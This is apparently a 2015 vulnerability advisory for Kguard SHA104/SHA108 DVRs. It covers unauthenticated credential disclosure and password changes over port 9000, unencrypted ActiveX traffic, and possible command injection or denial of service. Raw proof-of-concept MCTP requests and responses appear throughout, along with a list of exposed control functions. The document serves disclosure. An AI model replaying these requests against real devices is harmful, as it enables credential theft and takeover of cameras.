Kguard SHA104 / SHA108 Bypass / Command Injection

[Aerosol]

MULTIPLE VULNERABILITIES WITH KGUARD DIGITAL VIDEO RECORDERS, February 10, 
2015

PRODUCT DESCRIPTION

The Kguard SHA104 & SHA108 are 4ch/8ch H.264 DVRs designed for economical 
application. It's stylish & streamlines hardware design and excellent 
performance can be fast moving, competitive and an ideal solution for 
entry level & distribution channels. 

VENDOR REFERENCE: 
http://us.kworld-global.com/main/prod_in.aspx?mnuid=1306&modid=10&prodid=527

VULNERABILITY DESCRIPTION

1. Insufficient authentication and authorization

A deficiency in handling authentication and authorization has been found 
with Kguard 104/108 models. While password-based authentication is used by 
the ActiveX component to protect the login page, all the communication to 
the application server at port 9000 allows data to be communicated 
directly with insufficient or improper  authorization. 
The request HI_SRDK_SYS_USERMNG_GetUserList for example will show all the 
usernames in the system together with their passwords. The below example 
is an actual unmodified request and response by the server. 

REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0 
CSeq:6 
Accept:text/HDP 
Content-Type:text/HDP 
Func-Version:0x10 
Content-Length:51 
3Segment-Num:1 
Segment-Seq:1 
Data-Length:4

VMCTP/1.0 200 OK 
Content-Type:text/HDP 
CSeq:6 
Return-Code:0 
Content-Length:2326 
Segment-Num:2 
Segment-Seq:1 
Data-Length:2240 
eric 
111222 
111222 
admin 
111222 
111222 
333444 
333444 
555666 
555666 
user4 
user5 
user6 
Segment-Seq:2 
Data-Length:4

An interesting request is HI_SRDK_NET_MOBILE_GetOwspAttr. If configured, 
this allows mobile devices to access and monitor the cameras at port 
18004. An actual unmodified request and response is shown below.

REMOTE HI_SRDK_NET_MOBILE_GetOwspAttr MCTP/1.0 
CSeq:15 
Accept:text/HDP 
Content-Type:text/HDP 
Func-Version:0x10 
Content-Length:15 
Segment-Num:0

VMCTP/1.0 200 OK 
Content-Type:text/HDP 
CSeq:15 
Return-Code:0 
Content-Length:161 
Segment-Num:1 
Segment-Seq:1 
Data-Length:112 
admin 
111222

The password to this user can be changed easily by executing the 
HI_SRDK_NET_MOBILE_SetOwspAttr request as shown below and can be saved in 
memory by executing HI_SRDK_DEV_SaveFlash:

REMOTE HI_SRDK_NET_MOBILE_SetOwspAttr MCTP/1.0
CSeq:1
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:161

Segment-Num:1
Segment-Seq:1
Data-Length:112

admin.t..|A<.......n(...........111222444.eted!.p.c<.... ... 
...TF..............................................

The logs from the application server can confirm that the execution was 
successful:

[MCTP] [HI_MCTP_MethodProc_Remote] SUCCESS!!!!! 
/home/yala/svn/D9108_MLANG_QSEE/dvr/modules/vscp/mctp/server/hi_vscp_mctp_mthdproc.c 

606========================

GetNetworkState:192.168.254.200

Logs from the DVR also shows that an existing mobile device that tries to 
connect on port 18004 with previous credentials stored will fail: 

<     StreamingServer>  [                           run]        A 
client(116) connected[2010-09-11 12:30].
<    LangtaoCommProto>  [              handlePacketBody]        Input 
buffer total length: 60
<    LangtaoCommProto>  [              handlePacketBody]        tlv type: 
41
<    LangtaoCommProto>  [              handlePacketBody]        tlv 
length: 56
<    LangtaoCommProto>  [              handlePacketBody]        Login 
request received.
<    LangtaoCommProto>  [                handleLoginReq]        User Name: 

     admin   Passwrod:       111222
<    LangtaoCommProto>  [                handleLoginReq]        User name 
and/or password validate fail.
<     StreamingServer>  [                handleRequest2]        Send 
response to client.
<     StreamingServer>  [                handleRequest2]        Session 
closed actively.
<     StreamingServer>  [                           run]        Handle 
request fail.
----------------------- SESSION(116) END -----------------------

2. Lack of transport security

The communication to the application server is done by an unprotected 
ActiveX component that is  presented to the browser's initial session. The 
lack of transport encryption may allow us to exploit possible request from 
this component to the application server. This file is named as 
HiDvrOcx.cab. 

Decompiling the file will allow us to see the libraries being used:

-rw-rw-r--. 1 fjpfajardo fjpfajardo 1443576 Mar 11  2011 HiDvrOcx.ocx
-rw-rw-r--. 1 fjpfajardo fjpfajardo    1443 Mar 11  2011 HiDvrOcx.inf
-rw-rw-r--. 1 fjpfajardo fjpfajardo   27136 Mar 11  2011 HiDvrOcxESN.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo   26624 Mar 11  2011 HiDvrOcxITA.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo   26624 Mar 11  2011 HiDvrOcxBRG.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo   20992 Mar 11  2011 HiDvrOcxJPN.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo  155648 Mar 11  2011 HiDvrNet.dll
-rw-rw-r--. 1 fjpfajardo fjpfajardo  487525 Mar 11  2011 HiDvrMedia.dll

Interestingly, checking the DLL file named HiDvrNet.dll will reveal other 
types of controls which can be presented to the application server as 
well:

HI_SRDK_NET_MOBILE_GetOwspAttr
HI_SRDK_NET_MOBILE_SetAttr
HI_SRDK_NET_MOBILE_SetOwspAttr
HI_SRDK_NET_Network_DHCP_Client_GetAttr
HI_SRDK_NET_Network_DHCP_Client_SetAttr
HI_SRDK_NET_Network_GetDNSList
HI_SRDK_NET_Network_GetDefaultGateway
HI_SRDK_NET_Network_GetNetdevAttr
HI_SRDK_NET_Network_GetNetdevName
HI_SRDK_NET_Network_SetDNSList
HI_SRDK_NET_Network_SetDefaultGateway
HI_SRDK_NET_Network_SetNetdevAttr
HI_SRDK_NET_SetDdnsAttr
HI_SRDK_NET_SetEmailAttr
HI_SRDK_NET_SetIppreviewVodAttr
HI_SRDK_NET_SetMctpServerPort
HI_SRDK_NET_SetPppoeAttr
HI_SRDK_NET_SetWebServerPort
HI_SRDK_Open_Device
HI_SRDK_RECORDER_GetPlaybackAttr
HI_SRDK_RECORDER_GetRecordAttr
HI_SRDK_RECORDER_GetRecordSchedule
HI_SRDK_RECORDER_SetPlaybackAttr
HI_SRDK_RECORDER_SetRecordAttr
HI_SRDK_RECORDER_SetRecordSchedule
HI_SRDK_SYS_GetDaylightAttr
HI_SRDK_SYS_GetSysMaintainAttr
HI_SRDK_SYS_GetSystemAttr
HI_SRDK_SYS_SetDaylightAttr
HI_SRDK_SYS_SetSysMaintainAttr
HI_SRDK_SYS_SetSystemAttr
HI_SRDK_SYS_USERMNG_AddGroup
HI_SRDK_SYS_USERMNG_AddUser
HI_SRDK_SYS_USERMNG_DelGroup
HI_SRDK_SYS_USERMNG_DelUser
HI_SRDK_SYS_USERMNG_Disable
HI_SRDK_SYS_USERMNG_Enable
HI_SRDK_SYS_USERMNG_GetAuthorityList
HI_SRDK_SYS_USERMNG_GetGroupList
HI_SRDK_SYS_USERMNG_GetUserList
HI_SRDK_SYS_USERMNG_ModifyGroupInfo
HI_SRDK_SYS_USERMNG_ModifyUserInfo

3. Denial of Service and Command Injection

Input are not sanitized and filtered in some of the fields which may lead 
to a potential passive Denial of Service and/or command injection. By 
altering some requests such as HI_SRDK_NET_SetPppoeAttr, 
HI_SRDK_NET_Network_DHCP_Client_SetAttr, HI_SRDK_NET_SetWebServerPort or 
HI_SRDK_NET_Network_SetDefaultGateway, a malicous user may be able to 
disrupt connectivity to the DVR.

REMOTE HI_SRDK_NET_SetMctpServerPort MCTP/1.0
CSeq:58
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:49
1Segment-Num:1
Segment-Seq:1
Data-Length:2

REMOTE HI_SRDK_DEV_SaveFlash MCTP/1.0
CSeq:61
Accept:text/HDP
Content-Type:text/HDP
Func-Version:0x10
Content-Length:15
Segment-Num:0

The application server that listens for incoming requests at port 9000 is 
run by a binary called raysharp_dvr which suggest that the hardware 
manufacturer is Zhuhai RaySharp Technology Co. While the purpose for this 
vulnerability analysis is mainly for Kguard related DVR's, I believe that 
other devices that use the same firmware by the manufacturer and rebranded 
in the market are also vulnerable. 

576 root      20696 S   ./raysharp_dvr 
577 root      20696 S   ./raysharp_dvr 
578 root      20696 S   ./raysharp_dvr 
579 root      20696 S   ./raysharp_dvr 
580 root      20696 S   ./raysharp_dvr 
581 root      20696 S   ./raysharp_dvr 
582 root      20696 S   ./raysharp_dvr 

Timeline:

02/07/2015      - Discovery / PoC
02/09/2015      - Reported to vendor (NR)

Source